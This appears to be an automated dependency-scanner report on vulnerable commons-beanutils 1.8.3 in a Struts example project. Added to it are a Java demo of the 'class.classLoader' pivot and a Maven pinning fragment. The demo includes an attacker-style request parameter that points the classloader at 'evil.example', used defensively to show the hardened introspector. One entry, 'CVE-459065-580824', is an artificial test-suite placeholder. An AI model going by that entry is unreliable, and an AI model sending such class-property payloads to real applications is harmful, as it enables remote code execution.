Vulnerable Library - struts2-tiles-plugin-6.3.0.2.jar
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Vulnerabilities
*For some transitive vulnerabilities there is no version of the direct dependency that carries a fix. Check the "Details" section below for a version of the transitive dependency in which the vulnerability is fixed.
**In some cases a remediation PR cannot be created automatically for a vulnerability even though a remediation is available.
Details
CVE-459065-580824
Vulnerable Library - commons-beanutils-1.8.3.jar
BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.
Library home page: http://commons.apache.org/beanutils/
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Dependency Hierarchy:
- struts2-tiles-plugin-6.3.0.2.jar (Root Library)
- commons-digester-2.1.jar
- ❌ commons-beanutils-1.8.3.jar (Vulnerable Library)
Found in base branch: master
Reachability Analysis
This vulnerability is potentially reachable
org.apache.struts.examples.mailreader2.dao.impl.memory.MemoryUserDatabase (Application)
-> org.apache.commons.digester3.Digester (Extension)
-> org.apache.commons.digester3.CallMethodRule (Extension)
-> org.apache.commons.beanutils.ConvertUtils (Extension)
-> ❌ org.apache.commons.beanutils.locale.converters.SqlTimeLocaleConverter (Vulnerable Component)
Note: the call paths in this report run through the org.apache.commons.digester3 package, which is shipped by the commons-digester3 artifact, whereas the dependency hierarchy above lists commons-digester-2.1.jar (package org.apache.commons.digester). Confirm which Digester artifact the application actually loads before relying on the exact path; both Digester generations hand parsed XML values to commons-beanutils, so the upgrade of commons-beanutils is warranted either way.
Vulnerability Details
Created automatically by the test suite
Publish Date: 2010-06-07
URL: CVE-459065-580824
CVSS 3 Score Details (9.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
CVE-2019-10086
Vulnerable Library - commons-beanutils-1.8.3.jar
BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.
Library home page: http://commons.apache.org/beanutils/
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Dependency Hierarchy:
- struts2-tiles-plugin-6.3.0.2.jar (Root Library)
- commons-digester-2.1.jar
- ❌ commons-beanutils-1.8.3.jar (Vulnerable Library)
Found in base branch: master
Reachability Analysis
This vulnerability is potentially reachable
org.apache.struts.examples.mailreader2.dao.impl.memory.MemoryUserDatabase (Application)
-> org.apache.commons.digester3.Digester (Extension)
-> org.apache.commons.digester3.SetPropertyRule (Extension)
-> org.apache.commons.beanutils.PropertyUtils (Extension)
-> ❌ org.apache.commons.beanutils.PropertyUtilsBean (Vulnerable Component)
Vulnerability Details
In Apache Commons BeanUtils 1.9.2, a SuppressPropertiesBeanIntrospector class was added that lets an application hide the class property present on every Java object, and so block an attacker from reaching the ClassLoader through it. PropertyUtilsBean, however, did not register this introspector by default, so an application on 1.9.2 or 1.9.3 stayed exposed unless it opted in explicitly. Version 1.9.4 enables the suppression by default. The 1.8.3 build in this dependency tree predates the introspector entirely, so no configuration short of upgrading closes the path.
Publish Date: 2019-08-20
URL: CVE-2019-10086
CVSS 4 Score Details (6.9)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: N/A
- Impact Metrics:
- Confidentiality Impact: N/A
- Integrity Impact: N/A
- Availability Impact: N/A
Suggested Fix
Type: Upgrade version
Release Date: 2019-08-20
Fix Resolution: commons-beanutils:commons-beanutils:1.9.4
CVE-2014-0114
Vulnerable Library - commons-beanutils-1.8.3.jar
BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.
Library home page: http://commons.apache.org/beanutils/
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Dependency Hierarchy:
- struts2-tiles-plugin-6.3.0.2.jar (Root Library)
- commons-digester-2.1.jar
- ❌ commons-beanutils-1.8.3.jar (Vulnerable Library)
Found in base branch: master
Reachability Analysis
This vulnerability is potentially reachable
org.apache.struts.examples.mailreader2.dao.impl.memory.MemoryUserDatabase (Application)
-> org.apache.commons.digester3.Digester (Extension)
-> org.apache.commons.digester3.SetPropertyRule (Extension)
-> org.apache.commons.beanutils.PropertyUtils (Extension)
-> ❌ org.apache.commons.beanutils.PropertyUtilsBean (Vulnerable Component)
Vulnerability Details
Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.
Publish Date: 2014-04-30
URL: CVE-2014-0114
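The class-property pivot described under CVE-2019-10086 and CVE-2014-0114, shown as an added example (not code from the scanner report, from Struts or from Commons BeanUtils). It assumes a hypothetical UserForm bean standing in for a Struts ActionForm, a constructed request map, and commons-beanutils 1.9.2 or later on the classpath, since 1.8.3 has no SuppressPropertiesBeanIntrospector to register. The stock PropertyUtilsBean case reproduces the vulnerable behaviour only on 1.8.3 through 1.9.3; on 1.9.4 the suppressor is already active and the stock instance behaves like the hardened one.

```java
// Added example, not code from the scanner report or from the Apache projects.
// Needs commons-beanutils 1.9.2 or later on the classpath (1.8.3, the version in
// this dependency tree, has no SuppressPropertiesBeanIntrospector at all).
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.beanutils.BeanUtilsBean;
import org.apache.commons.beanutils.ConvertUtilsBean;
import org.apache.commons.beanutils.PropertyUtilsBean;
import org.apache.commons.beanutils.SuppressPropertiesBeanIntrospector;

public class ClassPropertyDemo {

    /** Hypothetical form bean standing in for a Struts ActionForm. */
    public static class UserForm {
        private String username;
        public String getUsername() { return username; }
        public void setUsername(String username) { this.username = username; }
    }

    /**
     * Walks a dotted property path the way a request-parameter binder does.
     * Returns null when the path is blocked (property unknown or suppressed).
     */
    static Object resolve(PropertyUtilsBean pub, Object bean, String path) {
        try {
            return pub.getNestedProperty(bean, path);
        } catch (NoSuchMethodException e) {
            return null;
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) throws Exception {
        UserForm form = new UserForm();
        // Constructed attacker-controlled parameter name: every object has getClass(),
        // and java.lang.Class has getClassLoader(), so the path pivots off the bean.
        String attackerPath = "class.classLoader";

        // 1. Stock PropertyUtilsBean. On 1.8.3 through 1.9.3 'class' is introspected
        //    like any other read-only property, so this yields the ClassLoader.
        //    On 1.9.4 the suppressor is registered by default and the result is null.
        PropertyUtilsBean stock = new PropertyUtilsBean();
        System.out.println("stock   : " + resolve(stock, form, attackerPath));

        // 2. Hardened instance: register the suppressor explicitly. This is the
        //    opt-in that applications on 1.9.2/1.9.3 had to make themselves.
        PropertyUtilsBean hardened = new PropertyUtilsBean();
        hardened.addBeanIntrospector(SuppressPropertiesBeanIntrospector.SUPPRESS_CLASS);
        System.out.println("hardened: " + resolve(hardened, form, attackerPath));

        // 3. Legitimate binding through the hardened instance still works, while a
        //    'class.*' key in the same request map is dropped by setProperty because
        //    the nested lookup of 'class' now fails with NoSuchMethodException.
        BeanUtilsBean binder = new BeanUtilsBean(new ConvertUtilsBean(), hardened);
        Map<String, String> request = new HashMap<>();   // constructed request parameters
        request.put("username", "alice");
        request.put("class.classLoader.URLs", "http://evil.example/");
        binder.populate(form, request);
        System.out.println("username: " + form.getUsername());
    }
}
```

Running this on 1.9.2 or 1.9.3 prints a ClassLoader instance for the stock case and null for the hardened one; on 1.9.4 both print null. The Struts 1 exploitation path in CVE-2014-0114 is the same pivot applied through ActionForm population, which is why the report's reachability path ends at PropertyUtilsBean rather than at any Struts class.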
CVSS 4 Score Details (6.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: N/A
- Impact Metrics:
- Confidentiality Impact: N/A
- Integrity Impact: N/A
- Availability Impact: N/A
For more information on CVSS4 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114
Release Date: 2014-04-30
Fix Resolution: commons-beanutils:commons-beanutils:1.9.4;org.apache.struts:struts2-core:2.0.5
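The report's footnote notes that a transitive vulnerability may have no fixed version of the direct dependency. In that situation the transitive version can be pinned from the consuming project's own pom.xml, as in this added fragment (an example, not the scanned /unknown-handler/pom.xml). It assumes Maven's dependencyManagement takes precedence over the version declared by struts2-tiles-plugin and commons-digester, which is standard Maven behaviour, and that the 1.9.x line remains binary compatible with the 1.8.x API that commons-digester 2.1 was built against, which the project's own test suite should confirm.

```xml
<!-- Added example, not from the scanned pom.xml. Pins the transitive
     commons-beanutils version for this project and every module that
     inherits this POM, overriding the 1.8.3 pulled in via commons-digester. -->
<dependencyManagement>
  <dependencies>
    <dependency>
      <groupId>commons-beanutils</groupId>
      <artifactId>commons-beanutils</artifactId>
      <version>1.9.4</version>
    </dependency>
  </dependencies>
</dependencyManagement>
```

To confirm the override took effect, run `mvn dependency:tree -Dincludes=commons-beanutils:commons-beanutils -Dverbose`: the entry under struts2-tiles-plugin > commons-digester should now read 1.9.4 with the annotation "(version managed from 1.8.3)", and no other 1.8.x copy should appear anywhere in the tree. A stale copy in a fat JAR or in the servlet container's shared lib directory would not be caught by this check and needs to be inspected separately.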